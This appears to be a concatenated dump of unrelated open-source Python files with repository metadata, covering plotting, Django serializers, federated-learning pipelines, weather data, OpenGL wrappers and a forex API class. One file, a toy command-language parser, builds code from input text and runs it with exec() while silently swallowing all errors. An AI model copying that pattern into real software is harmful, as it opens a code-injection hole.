node_names.get(sending_node),
node_names.get(receiving_node),
label=str(round(cg.weight, 2)) if debug else None,
color=color,
penwidth=width,
)
# Render, save (and show if on Windows)
if sys.platform == 'win32':
dot.render(filename, view=view)
else:
dot.render(filename, view=False)
# Remove graphviz file created during rendering
os.remove(filename)
| 35.587302
| 105
| 0.599688
|
2d32277f6d25d88937e6983c8ed7e6a7a25bdbff
| 595
|
py
|
Python
|
main.py
|
HenryFleming/cmd-lang
|
f98b34a8d79cdc92e91531b82b183176118faf25
|
[
"MIT"
] | null | null | null |
main.py
|
HenryFleming/cmd-lang
|
f98b34a8d79cdc92e91531b82b183176118faf25
|
[
"MIT"
] | null | null | null |
main.py
|
HenryFleming/cmd-lang
|
f98b34a8d79cdc92e91531b82b183176118faf25
|
[
"MIT"
] | null | null | null |
#Copyright (c) 2020 HenryFleming
#see LICENSE for more
def parse_line(cmds, line):
    parts = []
    last_part = ""
    skipping = False
    for char in line:
        if char == " " and not skipping:
            parts.append(last_part)
            last_part = ""
        if not char == " " or skipping:
            if not char == '"':
                last_part += char
            if char == '"':
                skipping = not skipping
    parts.append(last_part)
    last_part = ""
    try:
        cmd = parts[0]
        args = parts[1:len(parts)]
        argsStr = ""
        for e in args:
            argsStr += '"' + e + '",'
        exec('cmds.' + cmd + '([' + argsStr[0:len(argsStr) - 1] + '])')
    except:
        pass
| 21.25
| 57
| 0.568067
|
e00f9c871d21d82de7405d85a5e0d0139ff9c4c7
| 425
|
py
|
Python
|
env/Lib/site-packages/plotly/validators/scattergeo/marker/line/_colorsrc.py
|
andresgreen-byte/Laboratorio-1--Inversion-de-Capital
|
8a4707301d19c3826c31026c4077930bcd6a8182
|
[
"MIT"
] | 11,750
|
2015-10-12T07:03:39.000Z
|
2022-03-31T20:43:15.000Z
|
env/Lib/site-packages/plotly/validators/scattergeo/marker/line/_colorsrc.py
|
andresgreen-byte/Laboratorio-1--Inversion-de-Capital
|
8a4707301d19c3826c31026c4077930bcd6a8182
|
[
"MIT"
] | 2,951
|
2015-10-12T00:41:25.000Z
|
2022-03-31T22:19:26.000Z
|
env/Lib/site-packages/plotly/validators/scattergeo/marker/line/_colorsrc.py
|
andresgreen-byte/Laboratorio-1--Inversion-de-Capital
|
8a4707301d19c3826c31026c4077930bcd6a8182
|
[
"MIT"
] | 2,623
|
2015-10-15T14:40:27.000Z
|
2022-03-28T16:05:50.000Z
|
import _plotly_utils.basevalidators
class ColorsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self, plotly_name="colorsrc", parent_name="scattergeo.marker.line", **kwargs
):
super(ColorsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
**kwargs
)
| 30.357143
| 84
| 0.658824
|
9067a129687362ff0b25d652ccbc82f1c441eba5
| 691
|
py
|
Python
|
paw2018/userpicks/serializers.py
|
mdcollins80/PAW-api
|
ba40ec77301ac0c84a8ad95481323031b398168b
|
[
"MIT"
] | null | null | null |
paw2018/userpicks/serializers.py
|
mdcollins80/PAW-api
|
ba40ec77301ac0c84a8ad95481323031b398168b
|
[
"MIT"
] | null | null | null |
paw2018/userpicks/serializers.py
|
mdcollins80/PAW-api
|
ba40ec77301ac0c84a8ad95481323031b398168b
|
[
"MIT"
] | null | null | null |
from .models import UserPick
from rest_framework import serializers
from paw2018.nflteams.serializers import TeamIDSerializer
from paw2018.nflgames.serializers import GameIDSerializer
from paw2018.userteams.serializers import UserTeamIDSerializer
class UserPickSerializer(serializers.ModelSerializer):
team = UserTeamIDSerializer(read_only=True)
game = GameIDSerializer(read_only=True)
pick = TeamIDSerializer(read_only=True)
class Meta:
model = UserPick
fields = ('id', 'team', 'game', 'pick', 'correct')
class UserPickPostSerializer(serializers.ModelSerializer):
class Meta:
model = UserPick
fields = ('id', 'team', 'game', 'pick')
| 31.409091
| 62
| 0.746744
|
716246e64ee3d8f51ed1c144e04badc2d1c41403
| 1,676
|
py
|
Python
|
allegation/tests/views/ui/test_redirect_mobile_urls_to_desktop.py
|
invinst/CPDB
|
c2d8ae8888b13d956cc1068742f18d45736d4121
|
[
"Apache-2.0"
] | 16
|
2016-05-20T09:03:32.000Z
|
2020-09-13T14:23:06.000Z
|
allegation/tests/views/ui/test_redirect_mobile_urls_to_desktop.py
|
invinst/CPDB
|
c2d8ae8888b13d956cc1068742f18d45736d4121
|
[
"Apache-2.0"
] | 2
|
2016-05-24T01:44:14.000Z
|
2016-06-17T22:19:45.000Z
|
allegation/tests/views/ui/test_redirect_mobile_urls_to_desktop.py
|
invinst/CPDB
|
c2d8ae8888b13d956cc1068742f18d45736d4121
|
[
"Apache-2.0"
] | 2
|
2016-10-10T16:14:19.000Z
|
2020-10-26T00:17:02.000Z
|
from django.core.urlresolvers import reverse
from allegation.factories import OfficerFactory, AllegationCategoryFactory, OfficerAllegationFactory
from allegation.tests.utils.filter_tags_test_mixin import FilterTagsTestMixin
from common.tests.core import BaseLiveTestCase
from mobile.tests.mixins.mobile_visiting_url_mixins import MobileVisitingUrlMixins
class MobileComplaintPageRedirectTest(MobileVisitingUrlMixins, FilterTagsTestMixin, BaseLiveTestCase):
def assert_current_url_is_data_tool_page(self):
self.browser.current_url.should.contain('/data')
def test_redirect_mobile_complaint_page_to_data_tool(self):
category = AllegationCategoryFactory()
officer_allegation = OfficerAllegationFactory(cat=category)
crid = officer_allegation.allegation.crid
cat_id = category.id
self.visit_complaint_page(crid, cat_id)
self.assert_current_url_is_data_tool_page()
self.assert_have_filter_tags('Allegation ID', crid)
self.assert_have_filter_tags('Allegation Type', category.category)
class MobileSearchPageRedirectTest(FilterTagsTestMixin, BaseLiveTestCase):
def test_search_page_to_data_tool(self):
officer = OfficerFactory(officer_first='John', officer_last='Henry')
search_url = reverse('allegation:search-q-page', kwargs={'term': officer.officer_first})
self.visit(search_url)
self.assert_have_filter_tags('officer', officer.officer_first)
def test_search_page_no_result_to_homepage(self):
search_url = reverse('allegation:search-q-page', kwargs={'term': 'no_result'})
self.visit(search_url)
self.assert_no_filter_tags()
| 41.9
| 102
| 0.78043
|
dfe8ef1e09278203f038a0d6af34fd46defefb23
| 215
|
py
|
Python
|
service/__init__.py
|
dabarrell/api-mirror
|
b308ac97931ea68bf87cdb8cc18e7d1e7a5e7d29
|
[
"MIT"
] | 4
|
2018-03-20T09:19:25.000Z
|
2020-01-16T01:11:23.000Z
|
service/__init__.py
|
dabarrell/api-mirror
|
b308ac97931ea68bf87cdb8cc18e7d1e7a5e7d29
|
[
"MIT"
] | null | null | null |
service/__init__.py
|
dabarrell/api-mirror
|
b308ac97931ea68bf87cdb8cc18e7d1e7a5e7d29
|
[
"MIT"
] | null | null | null |
from flask import Flask
from .errorhandlers import error_handlers
from .config import configure_app
app = Flask(__name__)
import service.routes
app.register_blueprint(error_handlers)
configure_app(app)
| 19.545455
| 42
| 0.8
|
970fe676936d6f22bf5de2228eaca7cbc7a598fa
| 3,763
|
py
|
Python
|
examples/pipeline/local_baseline/pipeline-local-baseline-homo.py
|
qixiuai/FATE
|
6d50af65b96b5b226afda30dfa8e4a1e5746952d
|
[
"Apache-2.0"
] | null | null | null |
examples/pipeline/local_baseline/pipeline-local-baseline-homo.py
|
qixiuai/FATE
|
6d50af65b96b5b226afda30dfa8e4a1e5746952d
|
[
"Apache-2.0"
] | null | null | null |
examples/pipeline/local_baseline/pipeline-local-baseline-homo.py
|
qixiuai/FATE
|
6d50af65b96b5b226afda30dfa8e4a1e5746952d
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
from pipeline.backend.pipeline import PipeLine
from pipeline.component import DataIO
from pipeline.component import Evaluation
from pipeline.component import HomoLR
from pipeline.component import LocalBaseline
from pipeline.component import Reader
from pipeline.interface import Data
from pipeline.utils.tools import load_job_config
def main(config="../../config.yaml", namespace=""):
# obtain config
if isinstance(config, str):
config = load_job_config(config)
parties = config.parties
guest = parties.guest[0]
host = parties.host[0]
arbiter = parties.arbiter[0]
backend = config.backend
work_mode = config.work_mode
guest_train_data = {"name": "breast_homo_guest", "namespace": f"experiment{namespace}"}
host_train_data = {"name": "breast_homo_host", "namespace": f"experiment{namespace}"}
pipeline = PipeLine().set_initiator(role='guest', party_id=guest).set_roles(guest=guest, host=host, arbiter=arbiter)
reader_0 = Reader(name="reader_0")
reader_0.get_party_instance(role='guest', party_id=guest).algorithm_param(table=guest_train_data)
reader_0.get_party_instance(role='host', party_id=host).algorithm_param(table=host_train_data)
dataio_0 = DataIO(name="dataio_0", with_label=True, output_format="dense",
label_type="int", label_name="y")
homo_lr_0 = HomoLR(name="homo_lr_0", penalty="L2", optimizer="sgd",
tol=0.0001, alpha=0.01, max_iter=30, batch_size=-1,
early_stop="weight_diff", learning_rate=0.15, init_param={"init_method": "zeros"})
local_baseline_0 = LocalBaseline(name="local_baseline_0", model_name="LogisticRegression",
model_opts={"penalty": "l2", "tol": 0.0001, "C": 1.0, "fit_intercept": True,
"solver": "saga", "max_iter": 2})
local_baseline_0.get_party_instance(role='guest', party_id=guest).algorithm_param(need_run=True)
local_baseline_0.get_party_instance(role='host', party_id=host).algorithm_param(need_run=False)
evaluation_0 = Evaluation(name="evaluation_0", eval_type="binary", pos_label=1)
evaluation_0.get_party_instance(role='guest', party_id=guest).algorithm_param(need_run=True)
evaluation_0.get_party_instance(role='host', party_id=host).algorithm_param(need_run=False)
pipeline.add_component(reader_0)
pipeline.add_component(dataio_0, data=Data(data=reader_0.output.data))
pipeline.add_component(homo_lr_0, data=Data(train_data=dataio_0.output.data))
pipeline.add_component(local_baseline_0, data=Data(train_data=dataio_0.output.data))
pipeline.add_component(evaluation_0, data=Data(data=[homo_lr_0.output.data, local_baseline_0.output.data]))
pipeline.compile()
pipeline.fit(backend=backend, work_mode=work_mode)
if __name__ == "__main__":
parser = argparse.ArgumentParser("PIPELINE DEMO")
parser.add_argument("-config", type=str,
help="config file")
args = parser.parse_args()
if args.config is not None:
main(args.config)
else:
main()
| 44.270588
| 120
| 0.714855
|
56c3b1a197613e4f6ecdecc0b4cfce7533c60602
| 1,516
|
py
|
Python
|
src/collectors/ipvs/test/testipvs.py
|
vimeo/Diamond
|
542c3640cf9453a2accd5e8aecfb7caabd26d785
|
[
"MIT"
] | 2
|
2015-06-02T16:18:23.000Z
|
2020-07-28T06:07:29.000Z
|
src/collectors/ipvs/test/testipvs.py
|
vimeo/Diamond
|
542c3640cf9453a2accd5e8aecfb7caabd26d785
|
[
"MIT"
] | null | null | null |
src/collectors/ipvs/test/testipvs.py
|
vimeo/Diamond
|
542c3640cf9453a2accd5e8aecfb7caabd26d785
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# coding=utf-8
################################################################################
from test import CollectorTestCase
from test import get_collector_config
from test import unittest
from mock import Mock
from mock import patch
from diamond.collector import Collector
from ipvs import IPVSCollector
################################################################################
class TestIPVSCollector(CollectorTestCase):
def setUp(self):
config = get_collector_config('IPVSCollector', {
'interval': 10,
'bin': 'true',
'use_sudo': False
})
self.collector = IPVSCollector(config, None)
@patch('os.access', Mock(return_value=True))
@patch.object(Collector, 'publish')
def test_should_work_with_real_data(self, publish_mock):
with patch('subprocess.Popen.communicate', Mock(return_value=(
self.getFixture('ipvsadm').getvalue(), '')
)):
self.collector.collect()
metrics = {
"172_16_1_56:80.total.conns": 116,
"172_16_1_56:443.total.conns": 59,
"172_16_1_56:443.10_68_15_66:443.conns": 59,
"172_16_1_56:443.10_68_15_66:443.outbytes": 216873,
}
self.setDocExample(self.collector.__class__.__name__, metrics)
self.assertPublishedMany(publish_mock, metrics)
################################################################################
if __name__ == "__main__":
unittest.main()
| 31.583333
| 80
| 0.551451
|
4450676459632886beb28ddf711d6de394da4677
| 4,741
|
py
|
Python
|
getdata.py
|
afaan5556/dash_weatherdata
|
536fc84b6de5d588585a69f743563f2210eaa21b
|
[
"MIT"
] | null | null | null |
getdata.py
|
afaan5556/dash_weatherdata
|
536fc84b6de5d588585a69f743563f2210eaa21b
|
[
"MIT"
] | null | null | null |
getdata.py
|
afaan5556/dash_weatherdata
|
536fc84b6de5d588585a69f743563f2210eaa21b
|
[
"MIT"
] | null | null | null |
import pandas as pd
import os
import csv
## CONSTANTS
# Directory where TMY data lives
DIRECTORY = '../../../tmy_data/'
# A file in the directory to access df columns
DUMMYFILE = '690150TYA.csv'
## CATCHER / PRE-SETUP DATA STRUCTURES
# Dictionary which will have keys:epw station name, values:dataframe
DF_DICT = {}
# List that will be used to house a list of dicts (k: station name as string, v: df)
PLOT_SERIES_LIST = []
# List that will be used to house the values (df) in PLOT_SERIES_LIST as lists
PLOT_SERIES_TOLIST = []
# List that will be used to house the final list data readable by the dash plot function
DASH_PLOT_DATA = []
# Function that takes a csv file, reads only its first row, and appends the needed data to a list
def extract_city_state(csv_file):
head = []
with open(csv_file, "rt") as f:
# Read in the first line, split it on end line character, then split the first element on the comma
head = f.readline().split('\n')[0].split(',')
output_string = ""
# range(1, 3) used so that only the city and state are extracted
for i in range(1, 3):
output_string += head[i] + ", "
output_string = output_string[:-2]
return output_string
## DATA SETUP AND USER PROMPT/VALIDATION FUNCTIONS AND LOOPS
# Function to make a df
def make_df(file=str):
return pd.read_csv(DIRECTORY + file, skiprows=1)
# Function that prints a message as a banner
def banner_print(message=str):
print("")
print("#"*30, " ", message, " ", "#"*30)
print("")
# Show indexed list of parameters
def show_indexed_list(list_to_show, string_parameter):
banner_print("Here are the %s:" %string_parameter)
for index, i in enumerate(list_to_show):
# The + 1 prints indices starting at 1 instead of 0
print(index + 1, ": ", i)
print(" ")
# User input function with validation
def user_input_and_val(input_string, check_object):
while True:
try:
user_input = int(input("Enter %s: " %input_string))
if user_input < 1 or user_input > len(check_object):
print("Please enter a positive integer between 1 and %s" %len(check_object))
continue
break
except ValueError:
print("Invalid choice. Enter a positive integer only")
return user_input
def main():
# Create dummy df
test_df = make_df(DUMMYFILE)
# Set up x-axis date time list
date_time = [str(i) + " " + str(j) for i, j in zip(test_df['Date (MM/DD/YYYY)'].tolist(), test_df['Time (HH:MM)'].tolist())]
# Create a list of climate file parameters
plot_parameters = list(test_df.columns)
# Read all files as df and store each in a dict where:
# key = station name (string)
# value = df
for roots, dirs, files in os.walk(DIRECTORY):
for file in files:
DF_DICT[extract_city_state(DIRECTORY + file)] = make_df(file)
    # Create a corresponding list of the df_dict keys
DF_LIST = list(DF_DICT.keys())
# Tell user how many stations are available
banner_print("There are %s stations available to plot." %len(DF_LIST))
# Get station quantity to plot from user
station_qty = user_input_and_val("number of stations to display on plot:", DF_DICT)
# Show indexed list of parameters to user
show_indexed_list(plot_parameters, "available plot parameters")
# Get plot parameter from user
# The - 1 takes the screen index that starts at 1 and resets it to list indices that start at 0
plot_parameter_index = user_input_and_val("the index of the parameter to plot:", plot_parameters) - 1
chosen_parameter = plot_parameters[plot_parameter_index]
## LOOP TO GET
# Loop [user station qty] times
for i in range(1, station_qty + 1):
# Show indexed list of stations
show_indexed_list(DF_LIST, "stations")
# Get user station selection | The - 1 takes the screen index that starts at 1 and resets it to list indices that start at 0
user_selection_i = user_input_and_val("index of station %s to add to plot:" %i, DF_LIST) - 1
# Add series from selected station df to plot series list
chosen_df = DF_DICT[DF_LIST[user_selection_i]]
PLOT_SERIES_LIST.append({DF_LIST[user_selection_i] : chosen_df[chosen_parameter]})
# Remove the user selected item from the list
DF_LIST.pop(user_selection_i)
# Each element in the list of dicts
for i in list(PLOT_SERIES_LIST):
        # Each listified element (listified because 'i' is a dict whose values are df's)
for j in list(i.values()):
# The listified values still have indices. Append them to the catcher list object using .tolist()
PLOT_SERIES_TOLIST.append(j.tolist())
for i, j in zip(PLOT_SERIES_TOLIST, PLOT_SERIES_LIST):
# Plot data is element in list based list
# Series name is the key in each dict element of the df based list
DASH_PLOT_DATA.append({'x': date_time, 'y': i, 'type': 'line', 'name': list(j.keys())[0]})
return DASH_PLOT_DATA, chosen_parameter
| 38.544715
| 126
| 0.72896
|
1923a3d27012dc0cf325e520774cc2e2f474d00a
| 755
|
py
|
Python
|
Cartwheel/lib/Python26/Lib/site-packages/OpenGL/GL/ATI/draw_buffers.py
|
MontyThibault/centre-of-mass-awareness
|
58778f148e65749e1dfc443043e9fc054ca3ff4d
|
[
"MIT"
] | null | null | null |
Cartwheel/lib/Python26/Lib/site-packages/OpenGL/GL/ATI/draw_buffers.py
|
MontyThibault/centre-of-mass-awareness
|
58778f148e65749e1dfc443043e9fc054ca3ff4d
|
[
"MIT"
] | null | null | null |
Cartwheel/lib/Python26/Lib/site-packages/OpenGL/GL/ATI/draw_buffers.py
|
MontyThibault/centre-of-mass-awareness
|
58778f148e65749e1dfc443043e9fc054ca3ff4d
|
[
"MIT"
] | null | null | null |
'''OpenGL extension ATI.draw_buffers
This module customises the behaviour of the
OpenGL.raw.GL.ATI.draw_buffers to provide a more
Python-friendly API
'''
from OpenGL import platform, constants, constant, arrays
from OpenGL import extensions, wrapper
from OpenGL.GL import glget
import ctypes
from OpenGL.raw.GL.ATI.draw_buffers import *
### END AUTOGENERATED SECTION
from OpenGL.lazywrapper import lazy
@lazy( glDrawBuffersATI )
def glDrawBuffersATI( baseOperation, n=None, bufs=None ):
"""glDrawBuffersATI( bufs ) -> bufs
Wrapper will calculate n from dims of bufs if only
one argument is provided...
"""
if bufs is None:
bufs = n
n = None
bufs = arrays.GLenumArray.asArray( bufs )
if n is None:
n = arrays.GLenumArray.arraySize( bufs )
return baseOperation( n,bufs )
| 26.964286
| 57
| 0.750993
|
256bf6b7f0ebcc72134e9321060f0d35cd6bb064
| 3,399
|
py
|
Python
|
src/Final_Version/View/DisplayPowerups.py
|
qw33ha/T-Rex_Acceleration
|
491de89a6e532ac0cbda611a0ed3dd18fd858d11
|
[
"BSD-3-Clause"
] | 2
|
2021-06-02T05:52:23.000Z
|
2021-07-12T05:56:49.000Z
|
src/Final_Version/View/DisplayPowerups.py
|
qw33ha/T-Rex_Acceleration
|
491de89a6e532ac0cbda611a0ed3dd18fd858d11
|
[
"BSD-3-Clause"
] | null | null | null |
src/Final_Version/View/DisplayPowerups.py
|
qw33ha/T-Rex_Acceleration
|
491de89a6e532ac0cbda611a0ed3dd18fd858d11
|
[
"BSD-3-Clause"
] | null | null | null |
"""@package docstring
Documentation for this module.
DisplayPowerups class
Author: Dev^(enthusiases)
This class is responsible for displaying powerups on the screen.
"""
import random
import sys
import pygame
import time
sys.path.insert(1, '../Model')
import Powerups
import DetectCollision
##
# @file DisplayPowerups.py
# @brief This class is responsible for maintaining all powerups on the screen
## This is a class for powerups displaying
class DisplayPowerups():
POWERUPS_WIDTH = 65
POWERUPS_HEIGH = 65
INTERVAL_TIME = 1
RANDOMNESS = 0.01
RANDOM_MIN = 3
RANDOM_MAX = 5
## @brief Constructor of for DisplayPowerups class
# @param game_screen the game screen, a pygame.display object, where powerups are drawn
# @exception Exception IllegalArgumentException
def __init__(self, game_screen):
if (game_screen is None):
            raise Exception("IllegalArgumentException")
self.__game_screen = game_screen
self.__powerups_displayed = pygame.sprite.Group()
self.__generate_time = time.time()
## @brief Get the list of powerups on the screen
# @return a list of powerups on the screen
def get_powerups_list(self):
return self.__powerups_displayed
## @brief Remove a powerup from the list
# @param p the powerup to be removed
def remove_powerups(self, p):
self.__powerups_displayed.remove(p)
## @brief Randomly generate a powerup
# @param speed the speed of the powerup
# @param obstacles list of obstacles on the screen
    # @param obstacle_spawn_time the spawn time of obstacles
def generate_powerups(self, speed, obstacles, obstacle_spawn_time):
current_time = time.time()
if (current_time >= self.__generate_time + random.randint(DisplayPowerups.RANDOM_MIN, DisplayPowerups.RANDOM_MAX)
and current_time - obstacle_spawn_time >= DisplayPowerups.INTERVAL_TIME
and random.random() < DisplayPowerups.RANDOMNESS):
overlapping = False
new_powerups = Powerups.Powerups(self.__game_screen, DisplayPowerups.POWERUPS_WIDTH, DisplayPowerups.POWERUPS_HEIGH, speed)
for obstacle in obstacles:
if DetectCollision.detect_collision(obstacle, new_powerups):
overlapping = True
if not overlapping:
self.__powerups_displayed.add(new_powerups)
self.__generate_time = time.time()
## @brief Draw a powerup on the screen
# @param powerups the powerup to be drawn
def draw_powerups(self, powerups):
for p in powerups:
self.__game_screen.blit(p.get_img(), p.get_rect())
## @brief Update the position and draw all powerups in the list
# @param obstacles list of obstacles on the screen
def update_powerups(self, obstacles):
for element in self.__powerups_displayed:
overlapping = DetectCollision.find_collision_powerups(element, obstacles)
self.remove_powerups(overlapping)
element.update()
if element.get_rect().right < 0:
self.__powerups_displayed.remove(element)
## @brief Update the speed of all powerups on the screen
# @param speed the new speed of these powerups
def update_speed(self, speed):
for element in self.__powerups_displayed:
element.set_speed(speed)
| 37.351648
| 135
| 0.693439
|
f582509eeb59ed601e3b76763b45506d50770431
| 1,576
|
py
|
Python
|
package.py
|
OSS-Pipeline/rez-oiio
|
7c3a2e9ff5107078f8b3ea7a1d52bc19512710ad
|
[
"MIT"
] | null | null | null |
package.py
|
OSS-Pipeline/rez-oiio
|
7c3a2e9ff5107078f8b3ea7a1d52bc19512710ad
|
[
"MIT"
] | null | null | null |
package.py
|
OSS-Pipeline/rez-oiio
|
7c3a2e9ff5107078f8b3ea7a1d52bc19512710ad
|
[
"MIT"
] | null | null | null |
name = "oiio"
version = "2.1.16.0"
authors = [
"Sony Pictures Imageworks"
]
description = \
"""
OpenImageIO is a library for reading and writing images, and a bunch of related classes, utilities, and
applications. There is a particular emphasis on formats and functionality used in professional, large-scale
animation and visual effects work for film. OpenImageIO is used extensively in animation and VFX studios all
over the world, and is also incorporated into several commercial products.
"""
requires = [
"boost-1.61+",
"cmake-3+",
"gcc-6+",
"glew-2+",
"ilmbase-2.2+<2.4",
"jpeg_turbo-2+",
"numpy-1.12+",
"ocio-1.0.9+",
"openexr-2.2+<2.4",
"openjpeg-2+",
"png-1.6+",
"pugixml-1+",
"pybind11-2.2+",
"python-2.7+<3",
"tbb-2017.U6+",
"tiff-4+",
"zlib-1.2+"
]
variants = [
["platform-linux"]
]
tools = [
"iconvert",
"idiff",
"igrep",
"iinfo",
"maketx",
"oiiotool"
]
build_system = "cmake"
with scope("config") as config:
config.build_thread_count = "logical_cores"
uuid = "oiio-{version}".format(version=str(version))
def commands():
env.PATH.prepend("{root}/bin")
env.LD_LIBRARY_PATH.prepend("{root}/lib64")
env.PYTHONPATH.prepend("{root}/lib64/python" + str(env.REZ_PYTHON_MAJOR_VERSION) + "." + str(env.REZ_PYTHON_MINOR_VERSION) + "/site-packages")
# Helper environment variables.
env.OIIO_BINARY_PATH.set("{root}/bin")
env.OIIO_INCLUDE_PATH.set("{root}/include")
env.OIIO_LIBRARY_PATH.set("{root}/lib64")
| 23.878788
| 146
| 0.634518
|
75af6d2884c91b1342454f7381f33c0e5c1e0c83
| 5,179
|
py
|
Python
|
.venv/lib/python3.8/site-packages/fxcmpy/fxcmpy_oco_order.py
|
eo1989/VectorBTanalysis
|
bea3deaf2ee3fc114b308146f2af3e4f35f70197
|
[
"MIT"
] | null | null | null |
.venv/lib/python3.8/site-packages/fxcmpy/fxcmpy_oco_order.py
|
eo1989/VectorBTanalysis
|
bea3deaf2ee3fc114b308146f2af3e4f35f70197
|
[
"MIT"
] | null | null | null |
.venv/lib/python3.8/site-packages/fxcmpy/fxcmpy_oco_order.py
|
eo1989/VectorBTanalysis
|
bea3deaf2ee3fc114b308146f2af3e4f35f70197
|
[
"MIT"
] | null | null | null |
#
# fxcmpy_oco_order -- A Python Wrapper Class for the
# RESTful API as provided by FXCM Forex Capital Markets Ltd.
#
# Proof-of-Concept | Prototype Version for Illustration
# by The Python Quants GmbH
#
# The codes contained herein come without warranties or representations,
# to the extent permitted by applicable law.
#
# Read the RISK DISCLAIMER carefully.
#
# (c) FXCM Forex Capital Markets Ltd.
#
import datetime as dt
from fxcmpy.fxcmpy_order import fxcmpy_order
class fxcmpy_oco_order(object):
""" A class to realize oco orders of the FXCM API.
Caution:
Do not initialize fxcm oco order object manually, these orders will not
    be registered by the fxcm server, use the create_oco_order() method of the
fxcm class instead.
"""
def __init__(self, bulk_id, orders, connection, logger):
self.orders = dict()
self.logger = logger
self.__con = connection
try:
self.bulk_id = int(bulk_id)
except:
raise TypeError('bulk_id must be an integer.')
for order in orders:
if not isinstance(order, fxcmpy_order):
raise TypeError('orders must be of type fxcmpy_orders.')
order_id = order.get_orderId()
self.orders[order_id] = order
self.logger.info('Add order with id %s to oco order.' % order_id)
def get_ocoBulkId(self):
""" Return the id. """
return self.bulk_id
def get_orders(self):
""" Return all orders of the oco order."""
return list(self.orders.values())
def get_order_ids(self):
""" Return all ids of the containing orders."""
return list(self.orders.keys())
def add_order(self, orders):
""" Add orders to the oco order.
Arguments:
orders: list,
list of the orders to add to the oco order.
"""
order_ids = list()
for order in orders:
if not isinstance(order, fxcmpy_order):
self.logger.error('Invalid order in add_order: %s.' % order)
raise ValueError('order must be of type fxcmpy_order.')
if order.get_ocoBulkId() == self.bulk_id:
                self.logger.warn('order already member of oco order.')
else:
order_ids.append(order.get_orderId())
self.__con.add_to_oco(order_ids, self.bulk_id)
        self.logger.info('Orders %s added to oco order %s.'
% (order_ids, self.bulk_id))
def remove_order(self, orders):
""" Remove orders from the oco order.
Arguments:
orders: list,
list of the order to remove from the oco order.
"""
order_ids = list()
for order in orders:
if not isinstance(order, fxcmpy_order):
self.logger.error('Invalid order in add_order: %s.' % order)
raise ValueError('order must be of type fxcmpy_order.')
if order.get_ocoBulkId() != self.bulk_id:
self.logger.warn('order not member of oco order.')
else:
order_ids.append(order.get_orderId())
self.__con.remove_from_oco(order_ids)
self.logger.info('Orders %s removed from oco order %s.'
% (order_ids, self.bulk_id))
def edit_order(self, add_orders, remove_orders):
""" Add or remove orders to / from the oco order.
Arguments:
add_orders: list,
list of the orders to add to the oco order.
remove_orders: list,
list of the order to remove from the oco order.
"""
add_order_ids = list()
remove_order_ids = list()
for order in add_orders:
if not isinstance(order, fxcmpy_order):
self.logger.error('Invalid order in add_orders: %s.' % order)
raise ValueError('order must be of type fxcmpy_order.')
if order.get_ocoBulkId() == self.bulk_id:
                self.logger.warn('Order is already a member of the oco order.')
else:
add_order_ids.append(order.get_orderId())
for order in remove_orders:
if not isinstance(order, fxcmpy_order):
self.logger.error('Invalid order in remove_orders: %s' % order)
raise ValueError('order must be of type fxcmpy_order.')
if order.get_ocoBulkId() != self.bulk_id:
                self.logger.warn('Order is not a member of the oco order.')
else:
remove_order_ids.append(order.get_orderId())
self.__con.edit_oco(self.bulk_id, add_order_ids=add_order_ids,
remove_order_ids=remove_order_ids)
def __add__(self, order):
if not isinstance(order, fxcmpy_order):
            raise TypeError('order must be of type fxcmpy_order.')
order_id = order.get_orderId()
self.orders[order_id] = order
def __remove__(self, order):
if not isinstance(order, fxcmpy_order):
            raise TypeError('order must be of type fxcmpy_order.')
order_id = order.get_orderId()
del self.orders[order_id]
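# --- Usage sketch (editor's addition, not part of the original module) ---
# An oco order object is obtained from an authenticated fxcmpy connection;
# create_oco_order() arguments are intentionally omitted because its full
# signature belongs to the fxcm connection class, not to this module, and the
# access token below is a placeholder.
#
#   con = fxcmpy.fxcmpy(access_token='<token>')
#   oco = con.create_oco_order(...)               # returns an fxcmpy_oco_order
#   print(oco.get_ocoBulkId(), oco.get_order_ids())
#   oco.add_order([another_order])                # another_order: fxcmpy_order
#   oco.remove_order([another_order])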
| 33.412903
| 79
| 0.603012
|
6895a0d07c0afff8ab3687d9437d2fbc7dd2ef7c
| 13,972
|
py
|
Python
|
contrib/devtools/github-merge.py
|
doriancoins/doriancoin
|
1ff8a0324b642c030825d08bcc298fcde04dd7ec
|
[
"MIT"
] | null | null | null |
contrib/devtools/github-merge.py
|
doriancoins/doriancoin
|
1ff8a0324b642c030825d08bcc298fcde04dd7ec
|
[
"MIT"
] | null | null | null |
contrib/devtools/github-merge.py
|
doriancoins/doriancoin
|
1ff8a0324b642c030825d08bcc298fcde04dd7ec
|
[
"MIT"
] | 1
|
2017-12-04T07:18:09.000Z
|
2017-12-04T07:18:09.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2016-2017 Doriancoin Core Developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
# This script will locally construct a merge commit for a pull request on a
# github repository, inspect it, sign it and optionally push it.
# The following temporary branches are created/overwritten and deleted:
# * pull/$PULL/base (the current master we're merging onto)
# * pull/$PULL/head (the current state of the remote pull request)
# * pull/$PULL/merge (github's merge)
# * pull/$PULL/local-merge (our merge)
# In case of a clean merge that is accepted by the user, the local branch with
# name $BRANCH is overwritten with the merged result, and optionally pushed.
from __future__ import division,print_function,unicode_literals
import os
from sys import stdin,stdout,stderr
import argparse
import hashlib
import subprocess
import sys
import json,codecs
try:
from urllib.request import Request,urlopen
except ImportError:
from urllib2 import Request,urlopen
# External tools (can be overridden using environment)
GIT = os.getenv('GIT','git')
BASH = os.getenv('BASH','bash')
# OS specific configuration for terminal attributes
ATTR_RESET = ''
ATTR_PR = ''
COMMIT_FORMAT = '%h %s (%an)%d'
if os.name == 'posix': # if posix, assume we can use basic terminal escapes
ATTR_RESET = '\033[0m'
ATTR_PR = '\033[1;36m'
COMMIT_FORMAT = '%C(bold blue)%h%Creset %s %C(cyan)(%an)%Creset%C(green)%d%Creset'
def git_config_get(option, default=None):
'''
